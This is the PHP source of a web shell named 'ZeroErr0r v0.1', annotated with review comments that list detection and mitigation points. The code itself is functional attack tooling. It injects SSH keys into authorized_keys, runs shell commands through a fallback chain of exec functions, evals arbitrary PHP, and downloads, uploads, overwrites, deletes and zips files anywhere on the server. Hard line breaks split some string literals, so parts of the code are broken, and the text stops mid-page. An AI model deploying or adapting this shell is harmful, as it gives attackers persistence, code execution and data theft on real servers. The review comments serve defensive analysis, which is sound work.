
<?

php
// NOTE(review): access gate for the page. The only credential check is an
// unsalted MD5 of the POSTed password, compared with loose `==` against a
// hard-coded digest. That digest string is a stable indicator when hunting for
// copies of this file under a web root.
session_start();
// error_reporting(0);
if (isset($_POST['password'])) {
if (md5($_POST['password']) == 'bf211b896d1233e0b9fc5acb604b0329') {
// The plaintext password itself is what gets stored, so it also ends up in
// the server-side session store.
$_SESSION['password'] = $_POST['password'];
header("Location: ?");
} else {
// Success and failure redirect identically; nothing in this block logs or
// rate-limits failed attempts.
header("Location: ?");
}
}
// ssh key injector
// NOTE(review): persistence primitive. Appends the POSTed `pub_key`, unvalidated,
// to <DOCUMENT_ROOT>/../.ssh/authorized_keys, creating the .ssh directory first
// if it does not exist.
// This handler sits above the session check that gates the HTML further down,
// and nothing here reads $_SESSION['password']; for incident response, treat
// every POST carrying `inject_key` as potentially effective, logged in or not.
// Detection: a .ssh directory or an authorized_keys change made by the
// web-server account one level above a document root.
// Mitigation: the web-server account should have no write access outside the
// application's own data directories.
if (isset($_POST['inject_key'])) {
$key = $_POST['pub_key'];
// TODO: make this method works on windows servers
// this is only for linux server
chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
if (file_exists(getcwd() . "/.ssh")) {
if (!is_writable((getcwd() . '/.ssh'))) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
} else {
if (!is_writable(getcwd())) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
mkdir(getcwd() . "/.ssh");
}
// "a+" appends, so keys already in the file are kept.
$key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
fwrite($key_file, $key);
fclose($key_file);
// Switch back to the directory stored in $_SESSION['cd'].
chdir($_SESSION['cd']);
header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh k
ey injected successfully!"));
}
/**
 * Stream the file named by $filename to the client as an attachment.
 *
 * Sends the response headers and the file body, then exits. Redirects with a
 * message when the file does not exist; does nothing for an empty $filename.
 *
 * NOTE(review): read/exfiltration primitive. $path is the empty string, so the
 * caller-supplied name is used as-is with no base-directory restriction, and
 * the only caller visible in this file passes $_GET['view'] straight in. The
 * same value (or its extension) is also copied into the Content-Type and
 * Content-Disposition headers.
 * Detection: access-log entries with `action=download` and a filesystem path
 * in `view`.
 */
function download($filename){
if(!empty($filename)){
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
// Check file is exists on given path.
if(file_exists($download_file)) {
// Getting file extension.
$extension = explode('.',$filename);
$extension = $extension[count($extension)-1];
// For Gecko browsers
header('Content-Transfer-Encoding: binary');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . '
GMT');
// Supports for download resume
header('Accept-Ranges: bytes');
// Calculate File size
header('Content-Length: ' . filesize($download_file));
header('Content-Encoding: none');
// Change the mime type if the file is not PDF
header('Content-Type: application/'.$extension);
// Make the browser display the Save As dialog
header('Content-Disposition: attachment; filename=' . $filename);
readfile($download_file);
exit;
}
else {
header("Location: ?msg=" . base64_encode('File does not exists on given pa
th'));
}
}
}
// Dispatch: a request with both `view` and `action` set hands the raw `view`
// value to download() when the action matches the download keyword.
if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'down
load') {
download($_GET['view']);
}
// ?action=logout destroys the session and redirects back to the bare page.
if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
session_destroy();
header("Location: ?");
die();
}

/**
 * Recursively delete $dirname and everything beneath it.
 *
 * Returns false when no directory handle is available and true after the final
 * rmdir() call; the results of unlink() and rmdir() themselves are not checked.
 *
 * NOTE(review): destructive primitive reached from the `rmdir` request
 * parameter. Nothing in this function confines it to a base directory.
 */
function delete_directory($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
// $dir_handle is only assigned in the is_dir() branch above.
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
delete_directory($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
// NOTE(review): request-driven filesystem operations. Paths arrive
// base64-encoded in the query string (`cd`, `rmdir`, `rmfile`, `rmfile<N>`,
// `from`), so they do not match plain-text path searches in access logs; decode
// suspicious parameter values when reviewing them. Like the handlers above,
// these run before the session check that gates the HTML further down.
if (isset($_GET['cd'])) {
// Stored unvalidated; used below (and elsewhere) as the working directory.
$_SESSION['cd'] = base64_decode($_GET['cd']);
}
// Recursive directory delete on the resolved path.
if (isset($_GET['rmdir'])) {
$file = realpath(base64_decode($_GET['rmdir']));
if (file_exists($file)) {
if (is_writable($file)) {
delete_directory($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
// Single file delete.
if (isset($_GET['rmfile'])) {
$file = realpath(base64_decode($_GET['rmfile']));
if (file_exists($file)) {
if (is_writable($file)) {
unlink($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
// Batch delete: `multirmfile` is the count, `rmfile0`..`rmfile<N-1>` the paths.
if (isset($_GET['multirmfile'])) {
for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
$file = realpath(base64_decode($_GET['rmfile' . $i]));
if (file_exists($file)) {
if (is_writable($file)) {
if (is_dir($file)) {
rmdir($file);
} else {
unlink($file);
}
header("Location: ?msg=" . base64_encode("select
ed file(s) has been deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permis
sion denied!"));
}
}
}
}
// Everything after this point runs relative to the session's directory.
if (isset($_SESSION['cd'])) {
chdir($_SESSION['cd']);
}
// Rename/move: `from` is base64-encoded, `to` is taken raw and joined to the
// current directory without any check on its contents.
if (isset($_GET['to']) AND isset($_GET['from'])) {
$from = base64_decode($_GET['from']);
$to = $_GET['to'];
if (is_writable($from)) {
if (file_exists($from)) {
rename($from, getcwd() . '/' . $to);
header('Location: ?msg=' . base64_encode("file renamed s
uccessfully!"));
} else {
header("Location: ?msg=" . base64_encode("file doesn't e
xist"));
}
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
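/**
 * Render a byte count as a short human-readable size.
 *
 * Uses 1024-based multiples with two decimals for KB, MB and GB, a plain " B"
 * suffix from 1 byte upward, and "0 B" for anything below 1.
 *
 * @param int|float $bytes Size in bytes.
 * @return string Formatted size, e.g. "2.00 KB".
 */
function formatSizeUnits($bytes) {
    if ($bytes >= 1073741824) {
        return number_format($bytes / 1073741824, 2) . ' GB';
    }
    if ($bytes >= 1048576) {
        return number_format($bytes / 1048576, 2) . ' MB';
    }
    if ($bytes >= 1024) {
        // The unit suffix is a single-line literal; a wrapped literal would
        // put a line break inside the rendered size.
        return number_format($bytes / 1024, 2) . ' KB';
    }
    // The separate "> 1" and "== 1" branches produced the same text, so one
    // comparison covers both.
    if ($bytes >= 1) {
        return $bytes . ' B';
    }
    return '0 B';
}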
/**
 * Turn a numeric file mode (as returned by fileperms()) into a ten-character
 * listing string: one file-type letter followed by owner, group and world
 * rwx triads, with setuid/setgid/sticky folded into the execute position.
 *
 * Regular files are tagged 'r' here and unrecognised types 'u'.
 *
 * @param int $perms File mode bits.
 * @return string e.g. "drwxr-xr-x".
 */
function formatPerms($perms) {
    // File-type bits (top nibble of the mode) mapped to their one-letter tag.
    $typeLetters = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => 'r', // regular
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $typeBits = $perms & 0xF000;
    $info = isset($typeLetters[$typeBits]) ? $typeLetters[$typeBits] : 'u';

    // One row per class: read bit, write bit, execute bit, special bit, and
    // the letters shown for the special bit with / without execute.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner + setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group + setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world + sticky
    );
    foreach ($classes as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;
        $info .= ($perms & $readBit) ? 'r' : '-';
        $info .= ($perms & $writeBit) ? 'w' : '-';
        if ($perms & $execBit) {
            $info .= ($perms & $specialBit) ? $withExec : 'x';
        } else {
            $info .= ($perms & $specialBit) ? $withoutExec : '-';
        }
    }
    return $info;
}
/**
 * Format a file's last-modification time as "M-d-Y H:i:s".
 *
 * @param string $filename Path to inspect.
 * @return string|null The formatted timestamp, or null when the path does not exist.
 */
function modifiedDate($filename) {
    if (!file_exists($filename)) {
        return null;
    }
    $mtime = filemtime($filename);
    return date("M-d-Y H:i:s", $mtime);
}
/**
 * Run $in as an operating-system command and return its output as a string.
 *
 * NOTE(review): this is the command-execution core of the page. It tries exec,
 * passthru, system and shell_exec in that order, using the first one that
 * function_exists() reports, and falls back to popen. Most of the calls carry
 * the `@` operator, so their failures raise no PHP warnings.
 * Mitigation: a php.ini `disable_functions` list only stops this chain if it
 * covers all five functions; leaving any one enabled leaves a fallback usable.
 * Detection: shell processes spawned as children of the PHP / web-server
 * process.
 *
 * $in reaches the shell unescaped. The result stays the initial empty string
 * if the popen() fallback does not yield a resource.
 */
function ex($in) {
$out = '';
if(function_exists('exec')) {
// exec() fills $out with an array of output lines, joined below.
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
// passthru()/system() print directly, so output buffering captures it.
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
/**
 * Look up a program by shelling out to `which` through ex().
 *
 * @param string $p Program name; appended to the command line as-is.
 * @return string|false The command's output, or false when it is empty.
 */
function which($p) {
    $located = ex('which '.$p);
    return empty($located) ? false : $located;
}
// NOTE(review): write primitives. `edit` overwrites the file named in `dest`
// with the POSTed `content`; `touch`/`mkdir_path` create empty files and
// directories; `upload` stores a file under its client-supplied name with no
// type or extension filtering. is_writable() is the only gate on each.
// Detection: new or modified script files under the web root owned by the
// web-server account (file-integrity monitoring catches these).
// Mitigation: keep the web root read-only for the PHP process and make any
// upload directory non-executable.
if (isset($_POST['edit'])) {
if (is_writable($_POST['dest'])) {
// Mode 'w' truncates the target before writing.
$file = fopen($_POST['dest'], 'w');
fwrite($file, $_POST['content']);
fclose($file);
header('Location: ?msg=' . base64_encode("file saved!"));
} else {
header('Location: ?msg=' . base64_encode("permission denied!"));
}
}
// Create an empty file: `touch` is the base64-encoded directory, `file` the raw name.
if (isset($_GET['touch']) AND isset($_GET['file'])) {
if (is_writable(dirname(base64_decode($_GET['touch'])))) {
$content = "";
$fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],
"wb");
fwrite($fp,$content);
fclose($fp);
header("Location: ?msg=" . base64_encode($_GET['file'] . " has b
een created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
// Create a directory: `mkdir_path` is the base64-encoded parent, `folder` the raw name.
if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']
);
header("Location: ?msg=" . base64_encode($_GET['folder'] . " fol
der has been created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
// File upload into the directory given by the POSTed `path`.
if (isset($_POST['upload'])) {
if (is_writable($_POST['path'])) {
$files = @$_FILES["files"];
$fullpath = $_POST['path'] . "/" . $files["name"];
// if (file_exists($fullpath)) {
// header("Location: ?msg=" . base64_encode("file already e
xist!"));
// die();
// }
if ($files["name"] != '') {
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
header("Location: ?msg=" . base64_encode("file u
ploaded to $fullpath"));
} else {
header("Location: ?msg=" . base64_encode("an err
or occured!"));
}
}
} else {
header("Location: ?msg=" . base64_encode(base64_decode('permissi
on denied!')));
}
}
// The path bar posts `qpath`; it is re-issued as a base64 `cd` redirect.
if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
header("Location: ?cd=" . base64_encode($_POST['qpath']));
}

// NOTE(review): staging step. Bundles the selected files into an archive
// written to <cwd>/<last path component of cwd>.zip; `numfiles` is the count
// and `file0`..`file<N-1>` the base64-encoded paths.
// Detection: a .zip named after its own parent directory appearing inside a
// web-served directory.
if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == '


zip') {
$zip = new ZipArchive();
chdir($_SESSION['cd']);
// Split the working directory on the platform's separator to get its last component.
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$tmp = explode('\\', getcwd());
} else {
$tmp = explode('/', getcwd());
}
if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchiv
e::CREATE) === TRUE) {
for ($i = 0; $i < intval($_GET['numfiles']); $i++) {
// $zip->addFromString(basename(getcwd() . '/cx.txt'),
file_get_contents(getcwd() . '/cx.txt'));
$file = base64_decode($_GET['file' . $i]);
// Directories are skipped; files are added by base name only.
if (!is_dir($file)) {
$zip->addFile(basename($file));
}
}
$zip->close();
header("Location: ?msg=" . base64_encode("selected files has bee
n compressed and downloaded."));
} else {
echo "Failed!";
header("Location: ?msg=" . base64_encode("failed to create a zip
file"));
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>- ZerroErr0r v0.1</title>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn
.com/font-awesome/4.7.0/css/font-awesome.min.css">
<style type="text/css">
.hljs{display:block;overflow-x:auto;padding:.5em;background:#071
414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hlj
s-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-strin
g,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50
}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-bu
ilt_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hl
js-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.
hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1
dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs
-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selecto
r-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700
}.hljs-link{text-decoration:underline}
</style>
<script type="text/javascript">
window.addEventListener('load', function() {
var boxes = document.getElementsByClassName('box');
for (var i = 0; i < boxes.length; i++) {
boxes[i].innerHTML += "<span class='c1'></span><
span class='c2'></span><span class='c3'></span><span class='c4'></span>";
}
}, false);
</script>
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Electrolize)
;body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transitio
n:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:i
nline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,foot
er{text-align:right}body{background-color:#071414;font-family:Electrolize,monosp
ace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}heade
r .logo{float:left;position:relative;top:3px}header .info{float:right;text-trans
form:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15
px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:2
0px;border:1px solid #E3052B;}section .content{padding:20px}section .title{backg
round-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section ta
ble{width:100%}section table td{padding:5px 15px}section table .td_head td{paddi
ng:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:
#1A272E}section table tr:first-child:hover{background-color:transparent}section
a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:ce
nter;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}fo
rm textarea{width:100%;display:block;border:none;height:500px;background-color:t
ransparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form s
elect{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E
3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:trans
parent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#
071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#A
AA}form input[type=text]{border:none;background-color:transparent;font-size:1.1r
em;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E30
52B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.da
rk_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-we
bkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0
6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color
:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;bac
kground-color:#1A272E}#login input{background-color:transparent;border:1px solid
#E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin
-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{m
argin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#A
AA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family
: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E30
52B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box
.c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; bac
kground-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; r
ight: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; lef
t: -2px; }header { position: relative; }header .logo p, header .logo{font-weight
: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margi
n: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%,
-50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-c
olor: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}s
elect {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space:
pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-w
rap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 20px;border-
bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu b
utton{outline:none;border: 1px solid #E3052B;background-color: transparent;color
: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: '
Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{ba
ckground-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_sel
ect{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;
}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85
001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #8
5001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:
hover {background-color: transparent;}.off{display: none;}.port_scanner input[ty
pe='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width:
100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparen
t;}.port_scanner td {padding: 3px 0;}
</style>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highli
ght.min.js"></script>
</head>
<body>
<?php if (!isset($_SESSION['password'])) { ?>
<form action="" method="post" id="login" class="box">
<p class="title">PASSWORD</p><br>
<div class="content">
<input type="text" name="password" style="-webkit-text-security: square;
font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square
;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;"
autocomplete="off" spellcheck="false" autofocus>
<input type="submit" name="login" value="GET IN!" style="font-family: 'E
lectrolize', monospace;font-size: 1rem;">
</div>
</form>
<?php die(); } ?>

<header class="clearfix box">


<div class="logo">
<p>ZeroErr0r <span>v0.1</span></p>
</div>
<div class="info">
Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?>
</div>
</header>
<nav>
<ul>
<li><a href="?">explorer</a></li>
<li><a href="?view=evaluate">evaluate</a></li>
<li><a href="?view=info">info</a></li>
<li><a href="?view=terminal">terminal</a></li>
<li><a href="?view=port_scanner">port scanner</a></li>
<li><a href="?view=injector">injector</a></li>
<li><a href="?view=database">database</a></li>
<li><a href="?action=logout"><i class="fa fa-sign-out"></i> logo
ut</a></li>
</ul>
</nav>
<section class="box">
<?php if (isset($_GET['msg'])) { ?>
<div class="error"><?php echo base64_decode($_GET['msg']) ?></div>
<?php } ?>
<script>
function showAction() {
var s = document.getElementsByClassName('file_select');
var m = document.getElementsByClassName('action_menu')[0
];
for (var i = 0; i < s.length; i++) {
if (s[i].checked) {
m.style.display = 'block';
break;
} else {
m.style.display = 'none';
}
}
}
</script>
<div class="action_menu">
<button onclick="filesDelete()"><i class="fa fa-trash"></i> Dele
te</button>
<button onclick="filesCompress()"><i class="fa fa-download"></i>
Compress</button>
</div>
<!-- SUB_MENU -->
<?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GE
T['img']) AND $_GET['action'] == 'display') { ?>
<div class="view_action">
<a href="?view=<?php echo $_GET['view'] ?>&action=edit">
<button><i class="fa fa-pencil"></i> Edit</button></a>
<a href="?view=<?php echo $_GET['view'] ?>&action=downlo
ad"><button><i class="fa fa-download"></i> Download</button></a>
<a href="?rmfile=<?php echo base64_encode($_GET['view'])
?>"><button><i class="fa fa-trash"></i> Delete</button></a>
<a href="?"><button><i class="fa fa-close"></i> Close</b
utton></a>
</div>
<?php } ?>
<?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
<div class="view_action">
<a href="?view=<?php echo $_GET['view'] ?>"><button><i c
lass="fa fa-asterisk"></i> Basic Injector</button></a>
<a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><
button><i class="fa fa-exchange"></i> SSH Injector</button></a>
</div>
<?php } ?>
<form action="" method="POST">
<input class="title" value="<?php echo getcwd(); ?>" name="qpath
" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-widt
h: 2px;">
</form>
<div class="content">
<?php if (!isset($_GET['view'])) { ?>
<table>
<tr class="td_head">
<td>name</td>
<td>size</td>
<td>permissions</td>
<td>modified</td>
<td>action</td>
</tr>
<?php
// echo getcwd() . "<br>";
// chdir("..");
// echo getcwd();
$directories = array();
$files_list = array();
if ($handle = opendir('.')) {
while (false !== ($entry = readdir($handle))) {
if (is_dir($entry)) {
$directories[] = $entry;
} else {
$files_list[] = $entry;
}
}
closedir($handle);
}
asort($directories);
foreach ($directories as $dir) {
if ($dir != "." && $dir != "..") {
$size = "Dir";
$perms = formatPerms(fileperms($dir));
$modified = modifiedDate($dir);
$link = "?cd=" . base64_encode(getcwd() . "/" .
$dir);
$del = "?rmdir=" . base64_encode(getcwd() . "/"
. $dir);
$down_path = getcwd() . "/" . $dir;
$path = base64_encode($down_path);
// $upload_path = realpath(dirname(__FILE__) . $
dir);
echo "<tr>";
echo "<td><input type='checkbox' class='file_select'
onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-fold
er'></i> $dir</a></td>";
echo "<td>$size</td>";
echo "<td>$perms</td>";
echo "<td>$modified</td>";
echo "<td class='action'><a href='#' onclick='rename
(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action
=upload'>upl</a></td>";
echo "</tr>";
} else {
$size = "Link";
$perms = formatPerms(fileperms($dir));
$modified = modifiedDate($dir);
$down_path = getcwd() . "/" . $dir;
if ($dir == '..'){
$link = "?cd=" . base64_encode(getcwd()
. "/..");
$touch_path = base64_encode('..');
$mkdir_path = base64_encode('..');
$upload_dir = '..';
} else {
$link = "?cd=" . base64_encode(getcwd())
;
$touch_path = base64_encode($down_path);
$mkdir_path = base64_encode($down_path);
$upload_dir = getcwd();
}
echo "<tr>";
echo "<td><input type='checkbox' style='opacity:0;ma
rgin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir
</a></td>";
echo "<td>$size</td>";
echo "<td>$perms</td>";
echo "<td>$modified</td>";
echo "<td class='action'><a href='?view=$upload_dir&
action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a>
- <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>";
echo "</tr>";
}
}
foreach ($files_list as $file) {
// if ($file != "." && $file != "..") {
$size = formatSizeUnits(filesize($file));
$perms = formatPerms(fileperms($file));
$modified = modifiedDate($file);
$del = "?rmfile=" . base64_encode(getcwd() . "/"
. $file);
// $down_path = realpath(getcwd() . "/" . $file)
;
$path = getcwd() . "/" . $file;
$rename_path = base64_encode($down_path);
$isimg = @is_array(getimagesize($file));
// echo "<p>$file <b>" . formatSizeUnits(filesize($f
ile)) . "</b></p>";
echo "<tr>";
echo "<td><input type='checkbox' class='file_select'
onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=d
isplay&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>";
echo "<td>$size</td>";
echo "<td>$perms</td>";
echo "<td>$modified</td>";
echo "<td class='action'><a href='?view=$path&action
=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren<
/a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>
";
echo "</tr>";
// }
}
?>
</table>
<?php } else if (isset($_GET['view']) AND isset($_GET['action'])
AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
<?php $path_info = pathinfo($_GET['view']); ?>
<pre><code class="<?php echo $path_info['extension'] ?>"><?php
if (file_exists($_GET['view'])) {
if ($_GET['img'] === '1') {
$image = (strpos($_GET['view'], $_SERVER
['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#'
, 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view'];
// Read image path, convert to base64 en
coding
$imageData = base64_encode(file_get_cont
ents($image));
// Format the image SRC: data:{mime};ba
se64,{data};
$src = 'data: '. pathinfo($image, PATHIN
FO_EXTENSION) .';base64,'.$imageData;
// Echo out a sample image
echo '<img src="' . $src . '">';
} else {
$file = fopen($_GET['view'], 'r');
if (filesize($_GET['view']) > 0)
echo htmlspecialchars(fread($fil
e, filesize($_GET['view'])));
else
echo "Empty";
fclose($file);
}
}
?></code></pre>
<?php } else if (isset($_GET['view']) AND isset($_GET['action'])
AND $_GET['action'] == 'edit') { ?>
<?php
$file = fopen($_GET['view'], 'r');
if (filesize($_GET['view']) > 0)
$content = htmlspecialchars(fread($file, filesize($_GET[
'view'])));
else
$content = "";
fclose($file);
?>
<form action="" method="post">
<textarea name="content" spellcheck="false" autofocus><?
php echo $content ?></textarea>
<input type="hidden" name="dest" value="<?php echo $_GET
['view'] ?>">
<input type="submit" name="edit" value="Save!">
</form>
<?php } else if (isset($_GET['view']) AND isset($_GET['action'])
AND $_GET['action'] == 'upload') { ?>
<form action="" method="post" enctype="multipart/form-data" styl
e="border: 1px solid #AAA; padding: 20px;">
<p style="margin: 0;font-size: 1.2rem;">Local File Uploa
d</p>
<input type="hidden" name="path" value="<?php echo $_GET
['view'] ?>">
<input type="file" name="files">
<input type="submit" name="upload" value="Upload!">
</form>
<br><br>
<form action="" method="post" enctype="multipart/form-data" styl
e="border: 1px solid #AAA; padding: 20px;">
<p style="margin: 0;font-size: 1.2rem;">Remote File Uplo
ad</p>
<input type="hidden" name="path" value="<?php echo $_GET
['view'] ?>">
<input type="text" name="remote_file" placeholder="Remot
e File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relat
ive;top:-1px; width: 200px;">
<input type="submit" name="remote_upload" value="Upload!
">
</form>
<!-- EVALUATE -->
<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'eval
uate') { ?>
<form action="?view=evaluate" method="post">
<textarea name="eval_code" spellcheck="false" st
yle="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_PO
ST['eval_code']; } ?></textarea>
<input type="submit" name="eval" value="Go!">
<select name="language">
<option value="php">php</option>
<!-- <option value="python">python</opti
on>
<option value="perl">perl</option>
<option value="nodejs">nodejs</option>
<option value="ruby">ruby</option> -->
</select>
</form>
<?php
// NOTE(review): arbitrary PHP execution. The POSTed `eval_code` is passed to
// eval() unmodified whenever `language` is 'php'.
// Detection: POST requests to ?view=evaluate carrying an `eval_code` field;
// static scans for eval() fed directly from $_POST.
if (isset($_POST['eval'])) {
$code = $_POST['eval_code'];
$lang = $_POST['language'];
echo '<pre class="result">';
if ($lang == 'php') {
eval($code);
}
echo '</pre>';
}
?>
<!-- INFO -->
<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info
') { ?>
<div class="server_info">
<p class="info_head" onclick="toggle(this)">Serv
er Info</p>
<table class="off">
<tr>
<td>Root Disk</td>
<td><?php echo (formatSizeUnits(
disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_to
tal_space("/")); ?></td>
</tr>
<tr>
<td>PHP</td>
<td><?php echo phpversion() ?></
td>
</tr>
<tr>
<td>Python</td>
<td><?php if(which("python")) {
echo shell_exec("python --version 2>&1"); } ?></td>
</tr>
<tr>
<td>Curl</td>
<td><?php if(function_exists('cu
rl_version')) { $v = curl_version(); echo $v['version']; } ?></td>
</tr>
<tr>
<td>tar</td>
